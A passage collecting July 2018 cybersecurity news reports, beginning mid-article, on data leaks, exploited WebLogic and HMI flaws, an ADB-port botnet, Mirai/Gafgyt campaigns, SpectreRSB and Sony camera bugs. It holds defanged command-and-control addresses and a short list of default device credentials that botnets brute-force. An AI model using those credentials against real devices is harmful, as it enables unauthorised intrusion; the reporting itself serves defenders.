Gigamon says it will combine the two platforms to help enterprises leverage various security tools.

“The combination of the high-quality network data from the GigaSECURE Security Delivery Platform and the ICEBRG cloud-based platform will power the next generation of security capabilities. Together, our expertise in networking and security will help SOC teams focus on defending against the most severe threats in their environments,” William Peteroy, co-founder and CEO of ICEBRG, said.

The terms of the deal were not disclosed.

Data Leak at Robotics Firm Exposes Global Manufacturers
24.7.2018 securityweek Incindent

A publicly accessible server belonging to robotics vendor Level One Robotics and Controls, Inc. contained sensitive documents connected to more than one hundred manufacturing companies.

Established in 2000, the engineering service provider offers automation process and assembly for OEM’s, Tier 1 automotive suppliers, and end users, delivering services such as project management, design, integration, debug, and training.

The exposed server was discovered by UpGuard Cyber Risk team earlier this month. It contained 157 gigabytes of data, including documents, schematics, and other information belonging to the provider’s customers and employees.

The exposed data included “over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements,” the security firm reveals.

Specifications and use of the machines, as well as animations of the robots at work, customer contact details, and ID badge request forms were also found on the server.

Level One customers impacted by the data exposure include divisions of VW, Chrysler, Ford, Toyota, GM, Tesla and ThyssenKrupp.

The server also contained data belonging to organization’s employees, such as scans of driver’s licenses and passports and other identification. Level One business data was also exposed, including invoices, prices, contracts, typical business documents, and bank account details (including account and routing numbers, and SWIFT codes).

“The sheer amount of sensitive data and the number of affected businesses illustrate how third and fourth-party supply chain cyber risk can affect even the largest companies,” the security firm notes.

UpGuard says the data was exposed via rsync, the file transfer protocol commonly used for large data transfers. The researchers discovered that access to the server wasn’t restricted by IP or user and that the data was downloadable to any rsync client that connected to the rsync port.

“This is the same type of administrative error we continue to see over and over again both on-premise as well as in the cloud. Until organizations wholly operationalize security into their development lifecycle, we will likely continue to see similar data exposure from non-malicious insiders,” Matt Chiodi, VP of Cloud Security at RedLock, told SecurityWeek in an emailed commentary.

Discovered on July 1, 2018, the exposed rsync server was established to belong to Level One several days later. The company was successfully informed on the issue on July 9 and closed the exposure by the next day.

“The fact that this kind of breached happened and data from so many big players was involved goes to show that anyone can be a victim if third parties are not continuously vetted. It is no longer enough for companies to maintain trust through a one-time or annual audit. Big players should demand a transparent and ongoing demonstration of security controls in action,” James Lerud, head of the Behavioral Research Team at Verodin, said in an emailed commentary.

Recently Patched Oracle WebLogic Flaw Exploited in the Wild
24.7.2018 securityweek

At least two threat groups have started exploiting a critical Oracle WebLogic vulnerability patched earlier this month. The attacks began shortly after several proof-of-concept (PoC) exploits were made public.

The vulnerability, tracked as CVE-2018-2893 and assigned a CVSS score of 9.8, allows an unauthenticated attacker to remotely take control of a WebLogic Server. The flaw affects the product’s WLS Core Components subcomponent and it can be exploited via the T3 transport protocol.

The security hole impacts versions,, and, and it was addressed by Oracle with its July 2018 Critical Patch Update (CPU).

Oracle has credited five different researchers for independently reporting the flaw, and one of the experts already claims to have found a way to bypass the vendor’s patch.

Shortly after Oracle announced the latest security updates on July 18, several individuals released PoC exploits on GitHub and other websites.

The Netlab group at Chinese security company Qihoo 360 reported seeing the first attacks on July 21. The campaign used luoxkexp[.]com as its main command and control (C&C) server.

According to NetLab, the domain was registered in March 2017 and hackers have been using it ever since. The group that owns the domain, tracked by NetLab as luoxk, has been using it for campaigns involving DDoS bots, RATs, cryptocurrency mining, malicious Android APKs, and worm-style exploits with the Java RMI (Remote Method Invocation) service.

In the attacks involving CVE-2018-2893, the hackers delivered the XMRig Monero miner and the Bill Gates DDoS malware.

SANS has also tracked attacks exploiting CVE-2018-2893 and the organization has seen attempts to install what appears to be a backdoor.

It’s not uncommon for malicious actors to target Oracle WebLogic vulnerabilities in their attacks, with several campaigns spotted over the past months.

While Oracle has been busy developing patches for these flaws, researchers have managed to find ways to bypass the fixes.

Comments on Oracle WebLogic security

Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.2018 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations affect new digital technology can be seen by 44% of respondents claiming that compliance is the biggest priority when implementing a new digital technology, with 36% saying that speed of implementation is the prime priority. User adoption of that technology ranks second to last (30%), worsened only by the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."

AVEVA Patches Critical Flaws in HMI/SCADA Tools Following Schneider Merger
24.7.2018 securityweek

UK-based industrial software company AVEVA has patched two critical remote code execution vulnerabilities discovered by researchers in its InTouch and InduSoft development tools.

AVEVA merged with Schneider Electric earlier this year and took over the France-based industrial giant’s Avantis and Wonderware brands. The Wonderware portfolio includes the InduSoft Web Studio and InTouch Machine Edition HMI/SCADA software.

George Lashenko, a researcher with industrial cybersecurity firm CyberX, discovered that some versions of InTouch 2014 and 2017 are affected by a critical stack-based buffer overflow vulnerability. The flaw is tracked as CVE-2018-10628 and it has been assigned a CVSS score of 9.8.AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

“InTouch provides the capability for an HMI client to read and write tags defined in a view. A remote unauthenticated user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability with potential for code to be executed while performing a tag-write operation on a locale that does not use a dot floating point separator. The code would be executed under the privileges of the InTouch View process and could lead to a compromise of the InTouch HMI,” AVEVA wrote in its advisory.

David Atch, VP of research at CyberX, told SecurityWeek that the vulnerability can be exploited remotely from the Internet if the targeted system is exposed to the Web. The attacker can take control of the HMI by directly sending it specially crafted packets, but the attack can also involve a piece of malware designed to send the malicious packets to the HMI.

“This provides the attacker with full control of the ICS process, enabling them to manipulate process parameters and potentially cause destructive actions like allowing pressure or temperature in a mixing tank to rise above acceptable levels,” Atch explained.

AVEVA released InTouch 2017 Update 2 HF-17_2 /CR149706 and InTouch 2014 R2 SP1 HF-11_1_SP1 /CR149705 on July 13 to patch the vulnerability.

AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

Separately, researchers at Tenable discovered another critical remote code execution vulnerability. The security hole, tracked as CVE-2018-10620 with a CVSS score of 9.8, impacts both InTouch Machine Edition and InduSoft Web Studio.

“InduSoft Web Studio and InTouch Machine Edition provide the capability for an HMI client to read, write tags and monitor alarms and events. A remote user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. The code would be executed under the privileges of the Indusoft Web Studio or InTouch Machine Edition runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Machine Edition server machine,” AVEVA said in its advisory.

The company patched the flaw on July 13 with the release of Hotfix for each of the impacted products.

“These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks,” Tenable said in a blog post, which includes technical details and a PoC exploit.

The flaw is similar to one disclosed by Tenable in early May, but it’s triggered via a different command.

Security Orchestration Firm Siemplify Raises $14 Million
24.7.2018 securityweek IT

Siemplify, a New York, NY-based provider of security orchestration, automation and response (SOAR) tools, today announced that it has raised $14 million in a Series B funding round led by Jump Capital.

This latest funding brings the total amount raised by the company to $28 million.

Designed to help security operations teams work more efficiently, Siemplify’s platform assists with tasks ranging from incident triage and investigation to collaboration and remediation.

“SOAR enables the management of disparate cybersecurity tools - including SIEM, endpoint protection, threat intelligence and more - through a single platform that helps security operations teams respond to threats faster and more effectively,” the company explains.

Jump Capital was joined by the company’s existing investors G20 Ventures and 83North in the Series B round.

Siemplify is yet another cybersecurity startup founded by former Israeli Defense Forces (IDF) security experts.

Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency
24.7.2018 securityaffairs Android  Cryptocurrency

It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.
In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.

Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.

The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb.) According to the Google developer portal,

“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”

These are very powerful functions for debugging tools, and also useful for executing malicious code without being trapped by the usual security controls. As long as the adb tools is being used in a secured environment, it presents little risk. It is recommended that the adb service is disabled before releasing devices to consumers and it is common for the adb service to be restricted to USB connectivity only.

In early June security researcher Kevin Beaumont, warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet, “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.

According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”

ADBPort debugging tools

The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server, then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.

It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.

The Trend Micro researchers offer a few suggestions to reduce your risk:

On your mobile device, go to settings, select “Developer Options” and ensure that “ADB (USB) debugging and “Apps from Unknown Sources” are turned off
Apply recommended patches and updates from the vendor
Perform a factory reset to erase the malware if you feel you are infected
Update intrusion prevention systems (IPS) to identify potentially malicious code from reaching your device
The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.

DHS – Russian APT groups are inside US critical infrastructure
24.7.2018 securityaffairs APT

The US Government is warning of continuous intrusions in National critical infrastructure and it is blaming the Kremlin for the cyber attacks.
According to the US Department of Homeland Security, Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and are still targeting them.
These attacks could have dramatic consequence, an attack against a power grid could cause a massive power outage.

It isn’t a sci-fi, it has already happened in Ukraine and security experts blamed Russian APT groups tracked as Dragonfly and Energetic Bear.

According to the government experts, hackers were able to penetrate also air-gapped networks.

The Wall Street Journal quoted Homeland Security officials reporting various attacks.

“Hackers working for Russia claimed “hundreds of victims” last year in a long-running campaign that put them inside the control rooms of U.S. electric utilities where they could have caused blackouts, federal officials said.” states the WSJ.

The officials sustain that the Energetic Bear APT has already penetrated “hundreds” of systems in national power grids.

The DHS issued several alerts related to the APT attacks and shared technical details about their TTPs, including Indicators of Compromise (IOCs) to detect their presence in the IT infrastructure.

Cyber intrusions of critical infrastructure are part of long-term information warfare strategy.

Russians APT Groups carried out spear-phishing attacks against utilities’ equipment vendors and sub subtractors to gather intelligence and collect information to penetrate the infrastructure.

Hackers aim at the exploitation of the accesses into the utilities used by equipment makers and suppliers for ordinary maintenance and telemetry. Their accesses could allow them to deploy malware into the facilities.

Unfortunately, the attacks are still ongoing, many critical infrastructure are operated by private companies with pour cyber hygiene.

Unfortunately, in many cases, the operators totally ignore the presence of the attackers into their networks.

“They got to the point where they could have thrown switches,” Jonathan Homer, chief of industrial control system analysis for Homeland Security, told the paper.

Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation
24.7.2018 securityweek

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.Critical vulnerability found in Bluetooth

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” the Bluetooth SIG said.

Apple and Intel have already rolled out patches for this vulnerability. Apple fixed CVE-2018-5383 in the past weeks with the release of macOS High Sierra 10.13.5, iOS 11.4, watchOS 4.3.1, and tvOS 11.4.

Intel published an advisory on Monday, informing users that the high severity flaw impacts its Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families. The company has released both software and firmware updates to patch the security hole, and provided instructions on how to address the issue on Windows, Linux and Chrome OS systems.

Broadcom says some of its products using Bluetooth 2.1 or newer may be impacted, but it claims to have already made fixes available to its OEM customers. It’s now up to these companies to ensure that the patches reach end users.

CERT/CC’s advisory also lists Qualcomm as being affected, but the company has yet to provide any information.

EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.2018 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that "runs on encryption software to "generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aimming to become a global leader in digital security.

The commission expressed concern that the merger would reduce players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 Noveber to take a decision.

Information Disclosure, DoS Flaws Patched in Apache Tomcat
24.7.2018 securityweek

The Apache Software Foundation informed users over the weekend that updates for the Tomcat application server address several vulnerabilities, including issues that can lead to information disclosure and a denial-of-service (DoS) condition.

Apache Tomcat is an open source implementation of the Java Servlet, JavaServer Pages (JSP), Java WebSocket and Java Expression Language technologies. Tomcat is the most widely used web application server, with a market share of over 60 percent.

One of the more serious flaws, CVE-2018-8037, impacts Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Patches are included in Tomcat 9.0.10 and 8.5.32.Apache Tomcat vulnerabilities

The vulnerability, rated “important,” has been described by the Apache Software Foundation as an information disclosure issue caused by a bug in the tracking of connection closures that can lead to user sessions getting mixed up.

Another security hole rated “important” is CVE-2018-1336, a bug in the UTF-8 decoder that can lead to a DoS condition. The flaw affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x, and it has been resolved with the release of versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90.

“An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service,” the Apache Software Foundation said in its advisory.

The latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x releases also patch a low severity security constraints bypass issue tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the advisory for this vulnerability.

US-CERT has also released an alert, recommending that users review the Apache advisories and apply the updates.

Apache Tomcat vulnerabilities are less likely to be exploited in the wild. There was a worm targeting Apache Tomcat servers a few years ago, but it leveraged common username and password combinations rather than exploiting any vulnerabilities.

The Apache Software Foundation also informed customers last week of vulnerabilities impacting Apache Ignite, an open source memory-centric distributed database, caching, and processing platform. Ignite is currently ranked 66 by DB-Engines.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution .

Experts warn of new campaigns leveraging Mirai and Gafgyt variants
24.7.2018 securityaffairs BotNet

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.
Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online many variants emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014 had its source code was leaked in early 2015.

In September 2016, a joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by PaloAlto Network.

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include the code to target the D-Link DSL-2750B OS Command Injection flaw, experts noticed that the new feature was implemented only a few weeks after the publication of the Metasploit module for its exploitation on May 25.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot that is one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits such the code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-1562) in Dasan GPON routers, a flaw in Huawei router tracked as CVE-2017–17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, a JAWS Webserver command execution.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by PaloAlto.

The campaign leverages two different encryption schemes, the bot propagates only via exploits and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The last variant of Mirai uses the IP 213[.]183.53.120 for both for serving payloads and as a Command and Control (C2) server, the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers was using the same exploits of the previous one but also attempted to carry on credential brute force attacks.

The campaign was tracked as Okane by the name of the binaries downloaded by the shell script to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis.

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

root/t0talc0ntr0l4! – default credentials for Control4 devices
admin/adc123 – default credentials for ADC FlexWave Prism devices
mg3500/merlin – default credentials for Camtron IP cameras
Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”

mirai okane

Experts at PaloAlto Networks observed a third campaign, tracked as Hakai, that was attempting to infect devices with the Gafgyt malware by using all the previous exploits code, except for the UPnP SOAP TelnetD Command Execution exploit.

Further details about the campaigns, including IoCs are included in the post published by PaloAlto.

SpectreRSB – new Spectre CPU side-channel attack using the Return Stack Buffer
24.7.2018 securityaffairs Attack

Researchers from the University of California, Riverside (UCR) have devised a new Spectre CPU side-channel attack called SpectreRSB.
SpectreRSB leverage the speculative execution technique that is implemented by most modern CPUs to optimize performance.

Differently, from other Spectre attacks, SpectreRSB recovers data from the speculative execution process by targeting the Return Stack Buffer (RSB).

“rather than exploiting the branch predictor unit, SpectreRSB exploits the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return
addresses.” reads the research paper.

“We show that both local attacks (within the same process such as Spectre 1) and attacks on SGX are possible by constructing proof of concept attacks”

The experts demonstrated that they could pollute the RSB code to control the return address and poison a CPU’s speculative execution routine.

The experts explained that the RSB is shared among hardware threads that execute
on the same virtual processor enabling inter-process, or even inter-vm, pollution of the RSB

The academics proposed three attack scenarios that leverage the SpectreRSB attack to pollute the RSB and gain access to data they weren’t authorized to view.

In two attacks, the experts polluted the RSB to access data from other applications running on the same CPU. In the thirds attack they polluted the RSB to cause a misspeculation that exposes data outside an SGX compartment.

“an attack against an SGX compartment where a malicious OS pollutes the RSB
to cause a misspeculation that exposes data outside an SGX compartment. This attack bypasses all software and microcode patches on our SGX machine” continues the paper.

Researchers said they reported the issue to Intel, but also to AMD and ARM. Researchers only tested the attack on Intel CPUs, but it is likely that both AMD and ARM processors are affected because they both use RSBs to predict return addresses.

According to the researchers, current Spectre patches are not able to mitigate the SpectreRSB attacks.

“Importantly, none of the known defenses including Retpoline and Intel’s microcode patches stop all SpectreRSB attacks,” wrote the experts.

“We believe that future system developers should be aware of this vulnerability and consider it in developing defenses against speculation attacks. “

The good news is that Intel has already a patch that stops this attack on some CPUs, but wasn’t rolled out to all of its processors.

“In particular, on Core-i7 Skylake and newer processors (but not on Intel’s Xeon processor line), a patch called RSB refilling is used to address a vulnerability when the RSB underfills” continues the researchers.

“This defense interferes with SpectreRSB’s ability to launch attacks that switch into the kernel. We recommend that this patch should be used on all machines to protect against SpectreRSB.”

A spokesperson for Intel told El Reg the Xeon maker believes its mitigations do thwart SpectreRSB side-channel shenanigans:

“SpectreRSB is related to Branch Target Injection (CVE-2017-5715), and we expect that the exploits described in this paper are mitigated in the same manner. We have already published guidance for developers in the whitepaper, Speculative Execution Side Channel Mitigations. We are thankful for the ongoing work of the research community as we collectively work to help protect customers.”

Sony addresses remotely exploitable flaws in Sony IPELA E Network Cameras
23.7.2018 securityaffairs

Sony fixed 2 remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code.
Sony addressed two remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code on affected devices.

The first vulnerability, tracked as CVE-2018-3937, is a command injection issue that affects the measurementBitrateExec features implemented in the IPELA E Series Network Camera.

The vulnerability was reported by the researchers Cory Duplantis and Claudio Bozzato from Cisco Talos. An attacker could execute arbitrary code by sending specially crafted HTTP GET request to vulnerable devices.

“An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The experts explained that the devices fail to check on the server address while parsing the input measurement string. The attacker can provide any string as the server address and it will be executed via system.

“While parsing the input measurement string, there isn’t a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” continues the experts.


The second issue, tracked as CVE-2018-3938, is a stack buffer overflow that resides in the 802dot1xclientcert.cgi functionality of the Sony IPELA E Series Camera products.

“An exploitable stack buffer overflow vulnerability exists in the “802dot1xclientcert.cgi” functionality of Sony IPELA E Series Camera. A specially crafted POST request can cause a stack buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The vulnerability could be exploited by sending specially crafted POST request.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” continues the experts.

The 802dot1xclientcert.cgi component is “designed to handle everything related to certificate management for 802.1x.”

The system fails to check the strlen length of the incoming data that is directly copied to a local buffer via memcpy. This means that the attacker can provide content to trigger the stack-based buffer overflow that could allow the attacker to remotely execute commands on the affected device.

Both vulnerabilities effects Sony IPELA E series G5 firmware 1.87.00, the tech giant released an update last week to address them.

Botnet Targets Open Ports on Android Devices
23.7.2018 securityweek BotNet

A wave of attacks is targeting Android devices with port 5555 open, likely in an attempt to ensnare them into a botnet, Trend Micro warns.

TCP port 5555 is designed to allow management of devices via Android Debug Bridge (ADB), an Android SDK feature that allows developers to easily communicate with devices and to run commands on them or fully control them.

The ADB port is meant to be disabled on commercial devices and to require initial USB connectivity to be enabled. Last month, however, security researcher Kevin Beaumont revealed that many devices ship with ADB enabled, which leaves them exposed to attacks.

Scanning attacks specifically targeting the ADB port have been seen since January. In early 2018, a worm leveraging a modified version of Mirai’s code was searching for devices with open port 5555 to spread for crypto-mining purposes.

Now, Trend Micro says a new exploit is targeting port 5555. The security firm has observed a spike in activity on July 9-10, when network traffic came mainly from China and the US, followed by a second wave on July 15, primarily involving Korea.

“From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary,” Trend Micro explains.

After infecting devices, the malware targets a series of processes for termination and launches its own child processes, one of which is responsible for spreading the malware as a worm. It also opens a connection to the command and control (C&C) server.

The payload also contains a header with a number of targets and IP packet types to be sent, which could suggest the malware was designed to launch distributed denial of service (DDoS) attacks (it can send UDP, TCP SYN, and TCP ACK packets (with a random payload of random length), UDP with random payload tunneled through Generic Routing Encapsulation (GRE), and TCP SYN).

Trend Micro also discovered that the downloaded binaries connect to the C&C server at 95[.]215[.]62[.]169, which was found to be linked to the Mirai variant Satori.

“It’s reasonable to believe that the same author was behind this sample and Satori,” Trend's security researchers say.

The malware’s worm-like spreading capabilities could suggest other attacks might follow the recently observed spikes in activity, Trend Micro also notes. The security firm suggests the actor behind the malware might have been “testing the effectiveness of their tools and tactics to prepare for a more serious attack.”

An online search reveals over 48,000 IoT systems vulnerable to ADB exploitations, but not all of them might be exposed, as some are likely behind routers with Network Address Translation (NAT). Even so, misconfigurations might result in these devices becoming accessible from the Internet, turning them into easy targets for the malware.

“All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength,” Trend Micro concludes.

Microsoft Addresses Serious Vulnerability in Translator Hub
23.7.2018 securityweek

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

